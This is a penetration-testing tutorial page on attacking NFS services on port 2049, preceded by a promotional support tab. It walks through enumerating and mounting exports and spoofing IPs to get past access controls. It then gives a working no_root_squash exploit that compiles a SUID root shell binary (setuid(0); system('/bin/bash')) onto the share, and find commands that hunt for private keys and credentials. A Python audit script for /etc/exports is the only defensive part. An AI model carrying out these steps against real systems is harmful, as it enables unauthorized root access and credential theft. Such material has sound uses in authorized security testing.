# NFS Service - Port 2049

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚
  {% endtab %}
  {% endtabs %}

## Basic info

The **Network File System (NFS)** allows file sharing across Unix-like systems over a network. While convenient, NFS often exposes sensitive data and trust relationships due to misconfigurations or outdated security models. This guide delivers in-depth methods for discovering, analyzing, and exploiting NFS services during penetration testing engagements.

### Identifying NFS Services During Network Reconnaissance

#### Port Scanning and Service Enumeration

NFS uses the following ports:

* **TCP/UDP 2049** – NFS Service
* **TCP/UDP 111** – Portmapper (rpcbind)

Run a detailed Nmap scan:

```bash
nmap -sV -sT -p 111,2049 --script=nfs-showmount,nfs-ls,nfs-statfs <target-ip>
```

Check for exposed mount points and exports.

***

### Enumerating NFS Exports

#### Using `showmount`

Check accessible NFS shares:

```bash
showmount -e <target-ip>
```

Example output:

```
Export list for 10.0.0.1:
/home           *
/var/nfs        192.168.0.0/24
```

* `*` means the export is accessible from any host
* A CIDR range limits the export to clients in that trusted network

#### Bypassing IP-based Access Controls

Use a spoofed IP address, or proxy through a host in an allowed subnet. In some cases, misconfigured DNS resolution can allow access even when IP-based restrictions are in place.

***

## Mounting NFS Shares and Privilege Analysis

### Mounting an Export Locally

```bash
mkdir /mnt/nfs
mount -t nfs <target-ip>:/home /mnt/nfs
```

Check for files with improper permissions or user credentials.

### UID/GID Mappings and Root Squashing

By default, NFS applies **root squashing**: requests from a remote root user (UID 0) are mapped to the unprivileged anonymous account, `nfsnobody`. Check the `/etc/exports` configuration for the `no_root_squash` option:

```
/home *(rw,sync,no_root_squash)
```

If `no_root_squash` is set, a client's root user keeps root access to the exported files, which allows privilege escalation.
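
A defender-side check for the export options discussed above, added here as an example (not code from the original page): a small Python audit of `/etc/exports` syntax that flags `no_root_squash` and exports open to any host. The sample contents and the names `parse_exports` and `audit_exports` are constructed for illustration; line continuations and quoted paths are not handled.

```python
import re

# Constructed sample in /etc/exports syntax (not from a real host).
SAMPLE_EXPORTS = """\
# path          client(options)
/home           *(rw,sync,no_root_squash)
/var/nfs        192.168.0.0/24(rw,sync)
/srv/backup     10.0.0.5(ro,no_root_squash) *(ro)
/srv/pub        build01 (rw)
"""

# One client spec: optional host part, optional "(opt,opt,...)" part.
CLIENT_RE = re.compile(r"^([^()]*)(?:\(([^()]*)\))?$")


def parse_exports(text):
    """Yield (path, client, options) for every client spec on every line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs:
            m = CLIENT_RE.match(spec)
            if not m:
                continue  # malformed spec; skipped in this sketch
            # A bare "(rw)" after a space has no host part: it applies to any host.
            client = m.group(1) or "*"
            opts = set(filter(None, (m.group(2) or "").split(",")))
            yield path, client, opts


def audit_exports(text):
    """Return sorted (path, client, finding) tuples for risky export entries."""
    findings = []
    for path, client, opts in parse_exports(text):
        if "no_root_squash" in opts:
            findings.append((path, client, "no_root_squash"))
        if client == "*":
            findings.append((path, client, "any-host"))
            if "rw" in opts:
                findings.append((path, client, "any-host-rw"))
    return sorted(findings)


if __name__ == "__main__":
    for path, client, finding in audit_exports(SAMPLE_EXPORTS):
        print(f"{path:<12} {client:<16} {finding}")
```

The `/srv/pub` line shows a common typo: the space before `(rw)` gives `build01` only the default options and grants read-write access to every other host.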

***

## Exploiting no\_root\_squash for Remote Code Execution

### Step-by-Step Attack

1. **Create a SUID Binary on Mounted Share**

   ```bash
   echo -e '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\nint main(){setuid(0); system("/bin/bash");}' > rootsh.c
   gcc rootsh.c -o rootsh
   chmod +s rootsh
   mv rootsh /mnt/nfs/
   ```
2. **Trigger Execution on Target**\
   If the NFS share is mounted by a target system, wait for the binary to sync and then trigger execution through a scheduled task or user login.
3. **Gain Shell with Root Privileges**

***

## Enumerating and Extracting Sensitive Files

### Commands to Discover Valuable Files

```bash
find /mnt/nfs -type f -name "*.conf"
find /mnt/nfs -type f -name "*.pem"
find /mnt/nfs -type f -perm -4000
```

Look for:

* SSH private keys
* Database credentials
* Password backup files
* Misconfigured `.bashrc`, `.profile`, or crontabs

***

